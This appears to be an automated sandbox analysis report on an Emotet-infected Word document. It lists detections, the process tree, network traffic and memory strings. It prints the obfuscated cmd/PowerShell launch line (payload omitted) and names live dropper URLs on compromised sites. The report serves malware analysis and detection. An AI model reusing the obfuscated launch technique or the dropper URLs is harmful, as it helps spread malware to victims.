Analysis Report N00048481397007.doc

Overview

General Information

Sample Name: N00048481397007.doc
Analysis ID: 344134
MD5: ad7db0f946bc5c3bb051cb04f359e6a4
SHA1: 24d54a6a1c4280b948fb245c97e4823d319eefe1
SHA256: 4fc6cbe4fae599ca6ab094dc1115909a687754f49a3ff31671ae4fbc7b3296d1

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1144 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2372 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc [encoded command omitted] MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2532 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2584 cmdline: powershell -w hidden -enc [encoded command omitted] MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2712 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2688 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2692 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 260 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',JnNGuImBTNGmQ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2836 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2468 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',cGgBEdar MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2428 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2512 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',VWMVjHoJWTwKe MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2416 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2832 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',GOGZBCfUK MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 3040 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                            • rundll32.exe (PID: 2260 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',saFFaIU MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                              • rundll32.exe (PID: 2240 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                • rundll32.exe (PID: 1068 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',sKCf MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                  • rundll32.exe (PID: 1836 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                    • rundll32.exe (PID: 1360 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yorvuovvtuqtxoj\wcvkwfajnrxlso.qcf',HPKSdoSG MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000013.00000002.2111956527.0000000000190000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
0000000F.00000002.2106050192.0000000000310000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000012.00000002.2110708042.00000000001B0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

            Unpacked PEs

            Source | Rule | Description | Author | Strings
            17.2.rundll32.exe.370000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
            13.2.rundll32.exe.410000.1.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
            15.2.rundll32.exe.310000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
            12.2.rundll32.exe.400000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
            10.2.rundll32.exe.5d0000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

                      Sigma Overview

                      System Summary:

                      Sigma detected: Suspicious Call by Ordinal
                      Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2688, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1, ProcessId: 2692
                      Sigma detected: Suspicious Encoded PowerShell Command Line
                      Source: Process started; Author: Florian Roth, Markus Neis; Data: Command: powershell -w hidden -enc [encoded command omitted]

                      Signature Overview

                      AV Detection:

                      Antivirus detection for URL or domain
                      Source: http://nightlifemumbai.club/x/0wBD3/ Avira URL Cloud: Label: malware
                      Source: https://shop.nowfal.dev/wp-includes/RlMObf2j0/ Avira URL Cloud: Label: malware
                      Source: https://jflmktg.wpcomstaging.com/wp-content/AK/ Avira URL Cloud: Label: malware
                      Source: https://shop.nowfal.dev Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URL
                      Source: shop.nowfal.dev Virustotal: Detection: 7%
                      Source: e-wdesign.eu Virustotal: Detection: 5%
                      Multi AV Scanner detection for submitted file
                      Source: N00048481397007.doc Virustotal: Detection: 16%

                      Compliance:

                      Uses insecure TLS / SSL version for HTTPS connection
                      Source: unknown HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
                      Source: unknown HTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49169 version: TLS 1.0
                      Source: unknown HTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49170 version: TLS 1.0
                      Uses new MSVCR Dlls
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Binary contains paths to debug symbols
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2087459336.0000000002290000.00000002.00000001.sdmp
                      Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: global traffic DNS query: name: nightlifemumbai.club
                      Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.88.166:443
                      Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.217.6.174:80

                      Networking:

                      Potential dropper URLs found in powershell memory
                      Source: powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmp String found in memory: http://nightlifemumbai.club/x/0wBD3/!https://shop.nowfal.dev/wp-includes/RlMObf2j0/!http://e-wdesign.eu/wp-content/bn1IgDejh/!http://traumfrauen-ukraine.de/bin/JyeS/!https://jflmktg.wpcomstaging.com/wp-content/AK/!https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
                      Source: global traffic HTTP traffic detected: GET /x/0wBD3/ HTTP/1.1 Host: nightlifemumbai.club Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /wp-content/bn1IgDejh/ HTTP/1.1 Host: e-wdesign.eu Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /bin/JyeS/ HTTP/1.1 Host: traumfrauen-ukraine.de Connection: Keep-Alive
                      Source: Joe Sandbox View IP Address: 212.227.200.73
                      Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
                      Source: Joe Sandbox View ASN Name: AUTOMATTICUS
                      Source: Joe Sandbox View ASN Name: M247GB
                      Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE
                      Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                      Source: unknown HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
                      Source: unknown HTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49169 version: TLS 1.0
                      Source: unknown HTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49170 version: TLS 1.0
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5018462-B174-499E-B3BD-E7523F18DF93}.tmp
                      Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091212034.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088276083.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: powershell.exe, 00000005.00000002.2093071337.000000001B590000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: unknown DNS traffic detected: queries for: nightlifemumbai.club
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1569 Date: Tue, 26 Jan 2021 05:54:56 GMT Data Raw: [hex dump omitted]
                      Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: powershell.exe, 00000005.00000003.2086513222.000000001B657000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
                      Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
                      Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
                      Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                      Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                      Source: powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
                      Source: powershell.exe, 00000005.00000003.2086200041.000000001D303000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
                      Source: powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
                      Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                      Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                      Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0L
                      Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                      Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
                      Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                      Source: powershell.exe, 00000005.00000002.2086940849.0000000000391000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: powershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2096359937.000000001D337000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: powershell.exe, 00000005.00000002.2093071337.000000001B590000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab;
                      Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpString found in binary or memory: http://e-wdesign.eu
                      Source: powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmpString found in binary or memory: http://e-wdesign.eu/wp-content/bn1IgDejh/
                      Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
                      Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
                      Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
                      Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091212034.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088276083.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091212034.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088276083.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091516076.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088429744.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091550716.0000000001DF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091516076.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088429744.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091550716.0000000001DF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmpString found in binary or memory: http://nightlifemumbai.club
                      Source: powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmpString found in binary or memory: http://nightlifemumbai.club/x/0wBD3/
                      Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: powershell.exe, 00000005.00000002.2093071337.000000001B590000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: powershell.exe, 00000005.00000002.2093071337.000000001B590000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                      Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0B
                      Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0J
                      Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: powershell.exe, 00000005.00000003.2086513222.000000001B657000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
                      Source: powershell.exe, 00000005.00000003.2086200041.000000001D303000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
                      Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0/
                      Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmpString found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
                      Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmpString found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
                      Source: powershell.exe, 00000005.00000002.2087509388.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092846529.0000000002900000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: powershell.exe, 00000005.00000002.2096618257.000000001D4B0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                      Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091516076.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088429744.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091550716.0000000001DF7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpString found in binary or memory: http://traumfrauen-ukraine.de
                      Source: powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmpString found in binary or memory: http://traumfrauen-ukraine.de/bin/JyeS/
                      Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091516076.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088429744.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091550716.0000000001DF7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2087509388.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092846529.0000000002900000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at0E
                      Source: powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
                      Source: powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org0
                      Source: powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
                      Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
                      Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
                      Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
                      Source: powershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
                      Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
                      Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpString found in binary or memory: http://www.certifikat.dk/repository0
                      Source: powershell.exe, 00000005.00000002.2095948799.000000001D2B4000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
                      Source: powershell.exe, 00000005.00000002.2096359937.000000001D337000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
                      Source: powershell.exe, 00000005.00000003.2086421803.000000001D329000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
                      Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
                      Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmpString found in binary or memory: http://www.crc.bg0
                      Source: powershell.exe, 00000005.00000003.2086513222.000000001B657000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
